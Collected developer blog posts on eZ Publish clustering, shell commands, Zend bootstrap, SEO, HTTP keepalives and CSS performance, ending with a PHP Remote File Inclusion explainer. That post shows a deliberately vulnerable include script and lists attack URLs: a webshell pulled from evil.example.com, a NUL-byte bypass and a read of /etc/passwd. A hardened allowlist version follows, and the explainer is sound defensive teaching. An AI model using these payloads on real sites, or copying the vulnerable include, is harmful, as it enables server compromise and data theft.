
ezPublish 4.3 - admin panel js/css after clustering with eZDBFileHandler

If you have an ezPublish 4.3 installation clustered with eZDBFileHandler, you'll see that CSS and JavaScript files do not get served properly for the admin site. If you check the network request logs, they show a 404 error. After a lot of debugging and searching, I found that there is something wrong in the ezdbfile database table. The script "clusterize.php" does not update the datatype for admin CSS and JS files properly.

Firefox is able to overcome this problem and just serves them correctly, but Chrome, IE and Safari will just download the file to the desktop, thus preventing it from rendering correctly.

To solve this problem you need to manually update the datatype for those records. Set the datatype to "text/css" for the stylesheet records and "text/javascript" for the JavaScript records.


UPDATE ezdbfile SET datatype = 'text/css' WHERE name LIKE '%/cache/public/stylesheets/%';
UPDATE ezdbfile SET datatype = 'text/javascript' WHERE name LIKE '%/cache/public/javascript/%';

Linux command - find large size files

We often come across problems like 100% disk utilization. In such a situation, we need to know which files are occupying a large amount of disk space. To find such files, e.g. in this case files larger than 50 MB in the current directory, the command is as follows:

find . -type f -size +50000k -exec ls -lh {} \; | awk '{ print $9 ": " $5 }'

enjoy !!

Zend Framework - Bootstrap optimization quick step

I am using Zend Framework 1.11.11 in one of my applications. I have written different _init methods in the bootstrap to initialize the session, database connection, navigation loading, view helpers, etc. It worked well initially when traffic to the site was low. Afterwards I found that it was affecting performance. So I combined all things under one _init method.


class Bootstrap extends Zend_Application_Bootstrap_Bootstrap {

    // Single init method that replaces the separate _init* methods
    protected function _initApp() {

        $moduleLoader = new Zend_Application_Module_Autoloader(array(
            'namespace' => '',
            'basePath' => APPLICATION_PATH));

        // DB initialization
        // Zend_Registry::set
        // SMTP initialization
    }

}

Quick SEO Tips : Interlinking


Inter-Linking pages:
  • Do not focus only on the Home Page
  • Use proper anchor texts: Anchor texts are the hyperlinked texts which link pages. Avoid using generic texts like “Click Here” to optimize your page. Also ensure that your anchor texts are short and precise.
  • Avoid too many anchor texts: Too much of anything is bad. Too many anchor texts distract the visitor. Concentrate on a few well-thought-out, keyword-rich anchor texts for your pages.
  • Go for Absolute Links instead of Relative Links: Absolute Links ensure that pages pull each other up in Search Engine Result Pages.
  • Proper Navigation across site: The closer the page is from the Home Page, the more importance search engines give to the page. Ensure that your most important pages are in close proximity to the Home Page.

Tip - Page load time improvement

Here is a quick tip to reduce the page load time.

As you know, without keepalives each HTTP request needs its own TCP three-way handshake. So if you are fetching content from external objects and showing it on the page, it is quite helpful to turn on HTTP keepalives for external objects. Otherwise you add an extra round-trip for another TCP three-way handshake, plus slow-start, for every HTTP request. If you are worried about hitting global server connection limits, set the keepalive timeout to something short, like 5-10 seconds. Also look into serving your static content from a different webserver than your dynamic content. A stripped-down static file webserver can hold thousands of open connections in something like 10 megs of RAM total, whereas your main webserver might easily eat 10 megs of RAM per connection.

Browser rendering optimization


Use efficient CSS selectors 
1. Avoid a universal key selector.
Allow elements to inherit from ancestors, or use a class to apply a style to multiple elements.
2. Make your rules as specific as possible.
Prefer class and ID selectors over tag selectors.
3. Remove redundant qualifiers.
These qualifiers are redundant:
  • ID selectors qualified by class and/or tag selectors
  • Class selectors qualified by tag selectors (when a class is only used for one tag, which is a good design practice anyway).
4. Avoid using descendant selectors, especially those that specify redundant ancestors.
For example, the rule body ul li a {...} specifies a redundant body selector, since all elements are descendants of the body tag.
5. Use class selectors instead of descendant selectors.
For example, if you need two different styles for an unordered list item and an ordered list item, instead of using two rules:
ul li {color: blue;}
ol li {color: red;}
You could encode the styles into two class names and use those in your rules; e.g:
.unordered-list-item {color: blue;}
.ordered-list-item {color: red;}
If you must use descendant selectors, prefer child selectors, which at least only require evaluation of one additional node, not all the intermediate nodes up to an ancestor.
6. Avoid the :hover pseudo-selector for non-link elements for IE clients.
If you use :hover on non-anchor elements, test the page in IE7 and IE8 to be sure your page is usable.   If you find that :hover is causing performance issues, consider conditionally using a JavaScript onmouseover event handler for IE clients.

In my next post I will explain more techniques, so stay tuned.

DHTMLX - Ajax-enabled JavaScript grid control



dhtmlxGrid is an Ajax-enabled JavaScript grid control with cutting-edge functionality, powerful data binding, and excellent performance with large datasets. The component is easy-to-use and provides great flexibility due to its rich client-side API. dhtmlxGrid supports different datasources (XML, JSON, CSV, JavaScript array, and HTML table), and can be also loaded from custom XML format if needed.

More info

How to avoid RFI vulnerability in PHP.

What is RFI?
Remote File Inclusion (RFI) is a type of vulnerability that allows an attacker to include a remote file, usually through a script on the web server.
PHP provides functions such as "include" and "require" to include files in the currently executing script. The vulnerability occurs when user-supplied input is used without proper validation.

Example
Consider the script below:
<?php
   $file = 'file1';
   if (isset( $_GET['FILE'] ) )
      $file = $_GET['FILE'];
   include( $file . '.php' );
?>
<html>
<body>
<form method="get">
   <input type="checkbox" name="FILE" value="file1"> File 1
   <input type="checkbox" name="FILE" value="file2"> File 2
   <input type="submit">
</form>
</body>
</html>

The developer intended only file1.php and file2.php to be used as options. But as anyone can easily insert arbitrary values in FILE, it is possible to inject code from files:
  • /vulnerable.php?FILE=http://evil.example.com/webshell.txt? - injects a remotely hosted file containing malicious code.
  • /vulnerable.php?FILE=C:\\ftp\\upload\\exploit - executes code from an already uploaded file called exploit.php (local file inclusion vulnerability).
  • /vulnerable.php?FILE=C:\\notes.txt%00 - example using the NUL meta character to remove the .php suffix, allowing access to files other than .php. (With magic_quotes_gpc enabled, special characters are escaped, which limits the attack and disables the use of the NUL terminator.)
  • /vulnerable.php?FILE=/etc/passwd - allows an attacker to read the contents of the passwd file on a UNIX system through directory traversal.
I think this information will help PHP programmers to handle RFI vulnerabilities to some extent.
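
A hardened form of the script above, as an added example that is not part of the original post: the FILE value is only ever used as a key into a fixed allowlist, so none of the request strings listed above can reach include(). The pages/ directory and the resolve_page() helper are assumptions made for this example.

```php
<?php
// Added example, not from the original post. FILE is used only as a key into
// a fixed allowlist; no part of the request ever reaches include().

// Request value => file on disk. The pages/ directory is an assumption.
const ALLOWED_PAGES = [
    'file1' => __DIR__ . '/pages/file1.php',
    'file2' => __DIR__ . '/pages/file2.php',
];

// Returns the fixed path for an allowlisted key, or null for anything else.
function resolve_page($requested): ?string
{
    // FILE[]=x arrives as an array; reject every non-string value.
    if (!is_string($requested)) {
        return null;
    }
    return ALLOWED_PAGES[$requested] ?? null;
}

if (PHP_SAPI === 'cli') {
    // Offline check: the legitimate value plus the inputs listed in the post
    // (constructed sample data, run with "php thisfile.php").
    $samples = [
        'file1',
        'http://evil.example.com/webshell.txt?',
        'C:\\ftp\\upload\\exploit',
        '/etc/passwd',
        ['file1'],
    ];
    foreach ($samples as $sample) {
        $path = resolve_page($sample);
        echo json_encode($sample), ' => ', $path ?? 'rejected', PHP_EOL;
    }
    exit(0);
}

// Web request: fall back to the default page only when FILE is absent.
$path = resolve_page($_GET['FILE'] ?? 'file1');
if ($path === null) {
    http_response_code(400);
    exit('Unknown page');
}
include $path;
```

Keeping allow_url_include = Off in php.ini (the default since PHP 5.2) blocks the remote-URL case as defence in depth, but it does not stop local file inclusion, which is why the allowlist is still needed.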

Lithium, the most RAD framework for PHP 5.3+

Lithium, the most RAD framework for PHP 5.3+ is focused on quality, speed, and flexibility. It's a set of no-nonsense philosophies and tools that enable you to build better applications, in less time, without sacrificing quality or extensibility.
Lithium understands distributed storage and caching, queuing systems, micro-dispatch frameworks, with integrated support for document oriented databases like CouchDB and MongoDB, alongside relational databases like MySQL and PostgreSQL.
Lithium's architecture allows you to get your application up and running quickly, and still allows you to take control of the framework to support the requirements of your application.

Check this out for more info
